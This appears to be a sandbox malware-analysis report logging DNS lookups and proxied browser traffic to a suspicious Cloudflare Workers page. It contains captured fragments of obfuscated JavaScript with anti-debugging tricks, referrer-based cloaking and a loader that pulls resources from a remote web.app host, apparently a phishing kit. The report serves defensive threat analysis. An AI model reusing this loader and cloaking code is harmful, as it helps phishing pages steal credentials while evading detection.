May 27, 2024 00:47:32.040425062 CEST	1.1.1.1	192.168.2.6	0x9f31	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 00:47:32.040425062 CEST	1.1.1.1	192.168.2.6	0x9f31	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fanondiekoxzijds.jamesona8.workers.dev

https:

xjdcawrhzgcobuvuimlzladxi.kute.pw

rullbullpullpushcndapp.web.app

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49705	188.114.97.3	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:21 UTC	681	OUT	GET / HTTP/1.1 Host: fanondiekoxzijds.jamesona8.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 22:46:21 UTC	585	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 22:46:21 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 4411 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjQ83cdkATfXRNgprL7tD9t%2FmodBV%2Br5%2FtN%2BXSYqTlrhrsp7ucCURt3tJ2BrCUk7y36LX2dDHeebzyWheb13%2BwGUpcHTAT1NnhGr2F8k06gP76yRY9hl614WKsEp%2Fl19%2BTm5zrPpEUbgCmF%2FI08iOTBWwTCwIaiSZg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a14d000e02439d-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 22:46:21 UTC	784	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 Data Ascii: <!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex
2024-05-26 22:46:21 UTC	1369	IN	Data Raw: 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 53 35 62 4e 6d 67 45 49 4b 4a 73 33 69 65 34 52 55 58 32 2f 55 6a 54 4f 7a 38 77 64 6d 33 74 39 37 53 45 63 75 73 78 6b 32 70 72 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 77 74 59 70 6d 78 34 7a 45 33 76 51 32 75 69 30 46 38 50 43 36 31 6c 6f 6a 4a 2f 52 45 4f 71 46 53 38 58 33 78 67 51 59 4d 65 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 42 31 58 50 64 5a 33 70 46 36 41 35 77 56 2f 20 64 4f 77 69 6a 6e 49 72 57 63 53 43 31 36 73 50 66 42 68 52 62 30 47 48 4e 5a 78 4b 4d 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 Data Ascii: le" content="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sPfBhRb0GHNZxKM" /><meta property="og:des
2024-05-26 22:46:21 UTC	1369	IN	Data Raw: 76 62 69 68 75 4c 48 49 70 65 33 5a 68 63 69 42 30 50 57 55 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 70 5a 69 68 79 4b 58 74 32 59 58 49 67 64 44 31 79 4c 6d 46 77 63 47 78 35 4b 47 34 73 59 58 4a 6e 64 57 31 6c 62 6e 52 7a 4b 54 74 79 5a 58 52 31 63 6d 34 67 63 6a 31 75 64 57 78 73 4c 48 52 39 66 54 70 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 33 30 37 63 6d 56 30 64 58 4a 75 49 47 55 39 49 54 45 73 64 48 31 39 4b 43 6b 37 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 66 4d 48 67 30 4e 57 52 69 59 32 4d 6f 4b 58 30 73 4e 47 55 7a 4b 54 74 32 59 58 49 67 58 7a 42 34 4d 6d 4a 68 4d 7a 67 7a 50 56 38 77 65 44 46 6d 5a 6d 49 32 4d 79 68 30 61 47 6c 7a 4c 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6c 37 5a 6d Data Ascii: vbihuLHIpe3ZhciB0PWU/ZnVuY3Rpb24oKXtpZihyKXt2YXIgdD1yLmFwcGx5KG4sYXJndW1lbnRzKTtyZXR1cm4gcj1udWxsLHR9fTpmdW5jdGlvbigpe307cmV0dXJuIGU9ITEsdH19KCk7c2V0SW50ZXJ2YWwoZnVuY3Rpb24oKXtfMHg0NWRiY2MoKX0sNGUzKTt2YXIgXzB4MmJhMzgzPV8weDFmZmI2Myh0aGlzLGZ1bmN0aW9uKCl7Zm
2024-05-26 22:46:21 UTC	889	IN	Data Raw: 65 53 67 69 59 32 39 31 62 6e 52 6c 63 69 49 70 4f 7a 45 68 50 54 30 6f 49 69 49 72 64 43 39 30 4b 53 35 73 5a 57 35 6e 64 47 68 38 66 48 51 6c 4d 6a 41 39 50 54 41 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 48 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 32 46 73 62 43 67 69 59 57 4e 30 61 57 39 75 49 69 6b 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 58 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 58 42 77 62 48 6b 6f 49 6e 4e 30 59 58 52 6c 54 32 4a 71 5a 57 4e 30 49 69 6b 73 62 69 67 72 4b 33 51 70 66 58 52 79 65 58 74 70 5a 69 68 30 4b 58 4a 6c 64 48 56 79 62 69 42 Data Ascii: eSgiY291bnRlciIpOzEhPT0oIiIrdC90KS5sZW5ndGh8fHQlMjA9PTA/ZnVuY3Rpb24oKXtyZXR1cm4hMH0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuY2FsbCgiYWN0aW9uIik6ZnVuY3Rpb24oKXtyZXR1cm4hMX0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuYXBwbHkoInN0YXRlT2JqZWN0IiksbigrK3QpfXRyeXtpZih0KXJldHVybiB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49704	188.114.97.3	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:21 UTC	751	OUT	GET /?bbre=cikztgVjwNGEbqBylxm HTTP/1.1 Host: fanondiekoxzijds.jamesona8.workers.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://fanondiekoxzijds.jamesona8.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 22:46:21 UTC	577	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 22:46:21 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 4411 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSiYNc88PHuo%2FUEg83VD7Rg4IBtNKpt2OG2LpyRuBb1YUuLI7jnlC1C72a5dbl%2BRGfXF30Oe2BxW3hxOCe4eUV9yEJwf2mEvcntj%2FLBzNXXPSDX1RCBu5ttX0E9643T0CmogHlSv5E7shgQ7EOZPRZX3DMSi%2Fsndjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a14d00fd184408-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 22:46:21 UTC	792	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 Data Ascii: <!doctype html><html lang="en-US" dir="ltr"><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="googlebot" content="noindex,nofollow"><meta name="robots" content="noindex
2024-05-26 22:46:21 UTC	1369	IN	Data Raw: 65 6e 74 3d 22 2f 53 35 62 4e 6d 67 45 49 4b 4a 73 33 69 65 34 52 55 58 32 2f 55 6a 54 4f 7a 38 77 64 6d 33 74 39 37 53 45 63 75 73 78 6b 32 70 72 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 77 74 59 70 6d 78 34 7a 45 33 76 51 32 75 69 30 46 38 50 43 36 31 6c 6f 6a 4a 2f 52 45 4f 71 46 53 38 58 33 78 67 51 59 4d 65 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2f 42 31 58 50 64 5a 33 70 46 36 41 35 77 56 2f 20 64 4f 77 69 6a 6e 49 72 57 63 53 43 31 36 73 50 66 42 68 52 62 30 47 48 4e 5a 78 4b 4d 22 20 2f 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e Data Ascii: ent="/S5bNmgEIKJs3ie4RUX2/UjTOz8wdm3t97SEcusxk2pr" /><meta property="twitter:title" content="/wtYpmx4zE3vQ2ui0F8PC61lojJ/REOqFS8X3xgQYMeh" /><meta name="description" content="/B1XPdZ3pF6A5wV/ dOwijnIrWcSC16sPfBhRb0GHNZxKM" /><meta property="og:description
2024-05-26 22:46:21 UTC	1369	IN	Data Raw: 70 65 33 5a 68 63 69 42 30 50 57 55 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 70 5a 69 68 79 4b 58 74 32 59 58 49 67 64 44 31 79 4c 6d 46 77 63 47 78 35 4b 47 34 73 59 58 4a 6e 64 57 31 6c 62 6e 52 7a 4b 54 74 79 5a 58 52 31 63 6d 34 67 63 6a 31 75 64 57 78 73 4c 48 52 39 66 54 70 6d 64 57 35 6a 64 47 6c 76 62 69 67 70 65 33 30 37 63 6d 56 30 64 58 4a 75 49 47 55 39 49 54 45 73 64 48 31 39 4b 43 6b 37 63 32 56 30 53 57 35 30 5a 58 4a 32 59 57 77 6f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 66 4d 48 67 30 4e 57 52 69 59 32 4d 6f 4b 58 30 73 4e 47 55 7a 4b 54 74 32 59 58 49 67 58 7a 42 34 4d 6d 4a 68 4d 7a 67 7a 50 56 38 77 65 44 46 6d 5a 6d 49 32 4d 79 68 30 61 47 6c 7a 4c 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6c 37 5a 6d 39 79 4b 48 5a 68 63 69 Data Ascii: pe3ZhciB0PWU/ZnVuY3Rpb24oKXtpZihyKXt2YXIgdD1yLmFwcGx5KG4sYXJndW1lbnRzKTtyZXR1cm4gcj1udWxsLHR9fTpmdW5jdGlvbigpe307cmV0dXJuIGU9ITEsdH19KCk7c2V0SW50ZXJ2YWwoZnVuY3Rpb24oKXtfMHg0NWRiY2MoKX0sNGUzKTt2YXIgXzB4MmJhMzgzPV8weDFmZmI2Myh0aGlzLGZ1bmN0aW9uKCl7Zm9yKHZhci
2024-05-26 22:46:21 UTC	881	IN	Data Raw: 62 6e 52 6c 63 69 49 70 4f 7a 45 68 50 54 30 6f 49 69 49 72 64 43 39 30 4b 53 35 73 5a 57 35 6e 64 47 68 38 66 48 51 6c 4d 6a 41 39 50 54 41 2f 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 48 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 32 46 73 62 43 67 69 59 57 4e 30 61 57 39 75 49 69 6b 36 5a 6e 56 75 59 33 52 70 62 32 34 6f 4b 58 74 79 5a 58 52 31 63 6d 34 68 4d 58 30 75 59 32 39 75 63 33 52 79 64 57 4e 30 62 33 49 6f 49 6d 52 6c 59 6e 56 6e 5a 32 56 79 49 69 6b 75 59 58 42 77 62 48 6b 6f 49 6e 4e 30 59 58 52 6c 54 32 4a 71 5a 57 4e 30 49 69 6b 73 62 69 67 72 4b 33 51 70 66 58 52 79 65 58 74 70 5a 69 68 30 4b 58 4a 6c 64 48 56 79 62 69 42 75 4f 32 34 6f 4d 43 6c Data Ascii: bnRlciIpOzEhPT0oIiIrdC90KS5sZW5ndGh8fHQlMjA9PTA/ZnVuY3Rpb24oKXtyZXR1cm4hMH0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuY2FsbCgiYWN0aW9uIik6ZnVuY3Rpb24oKXtyZXR1cm4hMX0uY29uc3RydWN0b3IoImRlYnVnZ2VyIikuYXBwbHkoInN0YXRlT2JqZWN0IiksbigrK3QpfXRyeXtpZih0KXJldHVybiBuO24oMCl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49708	104.21.50.211	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:22 UTC	607	OUT	GET /6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js HTTP/1.1 Host: xjdcawrhzgcobuvuimlzladxi.kute.pw Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://fanondiekoxzijds.jamesona8.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 22:46:22 UTC	961	IN	HTTP/1.1 200 OK Date: Sun, 26 May 2024 22:46:22 GMT Content-Type: application/javascript; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: xjdcawrhzgcobuvuimlzladxi.kute.pw Access-Control-Allow-Methods: GET, POST, DELETE, PUT, PATCH, OPTIONS Access-Control-Allow-Headers: auth,authkey , authvalue, Authorization, User-Agent, Keep-Alive, Content-Type, X-Requested-With Access-Control-Allow-Credentials: true Access-Control-Max-Age: 1 X-Cache-Status: MISS CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DvM1IUnl3pjRQVu932Y4zTj65SEiiyhrMs%2Bc9%2Fb46DS3N4R%2BzeLHW89FPIMk8WsqHftrDGzpKCIYresvJwMtZcV3SdHQ4ovS1LsDn9ScehpwQjp1WJXVmXtMsIWPykbwJSQTrFzSsSOuMz7MwskhrU5P9lI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a14d047ef541f9-EWR alt-svc: h3=":443"; ma=86400
2024-05-26 22:46:22 UTC	408	IN	Data Raw: 65 61 38 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 53 63 72 69 70 74 28 74 2c 65 29 7b 76 61 72 20 72 2c 6e 3d 28 72 3d 21 30 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 3d 72 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6e 29 7b 76 61 72 20 74 3d 6e 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6e 3d 6e 75 6c 6c 2c 74 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 72 3d 21 31 2c 74 7d 29 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 6e 65 77 20 52 65 67 45 78 70 28 22 66 75 6e 63 74 69 6f 6e 20 2a 5c 5c 28 20 2a 5c 5c 29 22 29 2c 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 2b 5c 5c 2b 20 2a 28 3f 3a 5b 61 2d 7a Data Ascii: ea8function loadScript(t,e){var r,n=(r=!0,function(e,n){var t=r?function(){if(n){var t=n.apply(e,arguments);return n=null,t}}:function(){};return r=!1,t});!function(){n(this,function(){var t=new RegExp("function \$ \$"),e=new RegExp("\\+\\+ *(?:[a-z
2024-05-26 22:46:22 UTC	1369	IN	Data Raw: 6f 6e 28 29 7b 69 66 28 6e 29 7b 76 61 72 20 74 3d 6e 2e 61 70 70 6c 79 28 65 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 6e 3d 6e 75 6c 6c 2c 74 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 6f 3d 21 31 2c 74 7d 29 3b 73 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 74 72 79 7b 65 3d 46 75 6e 63 74 69 6f 6e 28 27 72 65 74 75 72 6e 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 7d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 20 29 29 3b 27 29 28 29 7d 63 61 74 63 68 28 74 29 7b 65 3d 77 69 6e 64 6f 77 7d 72 65 74 75 72 6e 20 65 7d 28 29 2c 65 3d 74 2e 63 6f 6e 73 6f 6c 65 3d 74 2e 63 6f 6e 73 6f 6c 65 Data Ascii: on(){if(n){var t=n.apply(e,arguments);return n=null,t}}:function(){};return o=!1,t});s(this,function(){for(var t=function(){var e;try{e=Function('return (function() {}.constructor("return this")( ));')()}catch(t){e=window}return e}(),e=t.console=t.console
2024-05-26 22:46:22 UTC	1369	IN	Data Raw: 68 28 6c 29 29 3a 6e 5b 69 5d 3d 6c 7d 72 65 74 75 72 6e 20 6e 7d 3b 76 61 72 20 64 6d 6c 3d 5b 22 68 74 74 70 73 3a 2f 2f 72 75 6c 6c 62 75 6c 6c 70 75 6c 6c 70 75 73 68 63 6e 64 61 70 70 2e 77 65 62 2e 61 70 70 2f 68 74 79 74 78 7a 64 7a 76 64 73 66 64 7a 78 63 63 2f 74 68 65 6d 65 73 2f 63 73 73 2f 64 64 62 36 35 62 66 61 31 62 39 32 31 36 32 38 34 34 63 34 31 32 31 37 33 61 34 64 66 64 66 30 6e 62 72 31 37 31 33 39 37 37 34 33 32 2e 63 73 73 22 2c 22 68 74 74 70 73 3a 2f 2f 72 75 6c 6c 62 75 6c 6c 70 75 6c 6c 70 75 73 68 63 6e 64 61 70 70 2e 77 65 62 2e 61 70 70 2f 68 74 79 74 78 7a 64 7a 76 64 73 66 64 7a 78 63 63 2f 74 68 65 6d 65 73 2f 63 73 73 2f 37 62 34 64 37 32 34 39 62 39 62 62 30 64 33 64 62 31 64 34 39 63 31 63 38 64 32 34 31 31 30 34 6e 62 Data Ascii: h(l)):n[i]=l}return n};var dml=["https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css","https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nb
2024-05-26 22:46:22 UTC	613	IN	Data Raw: 6e 20 65 3b 65 28 30 29 7d 63 61 74 63 68 28 74 29 7b 7d 7d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 30 78 31 64 34 36 30 35 28 29 7d 2c 34 65 33 29 2c 21 28 22 72 65 66 65 72 72 65 72 22 69 6e 20 64 6f 63 75 6d 65 6e 74 26 26 22 22 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 7c 7c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 71 75 65 72 79 4e 42 52 28 29 2e 62 62 72 65 3f 6c 6f 61 64 53 63 72 69 70 74 28 64 6d 6c 2c 30 29 3a 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 62 6f 64 79 22 29 5b 30 5d 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 64 69 76 20 73 74 79 6c 65 3d 27 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 Data Ascii: n e;e(0)}catch(t){}}setInterval(function(){_0x1d4605()},4e3),!("referrer"in document&&""==document.referrer)\|\|window.location.queryNBR().bbre?loadScript(dml,0):(document.getElementsByTagName("body")[0].innerHTML="<div style='color:#222;text-align:unset;ma
2024-05-26 22:46:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49712	199.36.158.100	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:22 UTC	644	OUT	GET /htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://fanondiekoxzijds.jamesona8.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-26 22:46:23 UTC	608	IN	HTTP/1.1 200 OK Connection: close Content-Length: 1086 Cache-Control: max-age=3600 Content-Type: text/css; charset=utf-8 Etag: "2c2f42530360d92df6a9043afb8385defb5a11ba6299d3a885ecfdb3ce6e12e7" Last-Modified: Mon, 06 May 2024 16:50:03 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Sun, 26 May 2024 22:46:23 GMT X-Served-By: cache-nyc-kteb1890076-NYC X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1716763583.982257,VS0,VE101 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-05-26 22:46:23 UTC	1086	IN	Data Raw: 23 6f 75 74 64 61 74 65 64 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 22 53 65 67 6f 65 20 55 49 22 2c 73 61 6e 73 2d 73 65 72 69 66 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 35 36 34 38 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6c 65 66 74 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 74 6f 70 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 35 30 30 3b 70 61 64 64 69 6e 67 3a 30 20 32 34 70 78 20 32 34 70 78 Data Ascii: #outdated {font-family:"Open Sans","Segoe UI",sans-serif;position:absolute;background-color:#f25648;color:white;display:none;overflow:hidden;left:0;position:fixed;text-align:center;text-transform:uppercase;top:0;width:100%;z-index:1500;padding:0 24px 24px

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49713	199.36.158.100	443	5904	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-26 22:46:23 UTC	644	OUT	GET /htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nbr1713977432.css HTTP/1.1 Host: rullbullpullpushcndapp.web.app Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://fanondiekoxzijds.jamesona8.workers.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
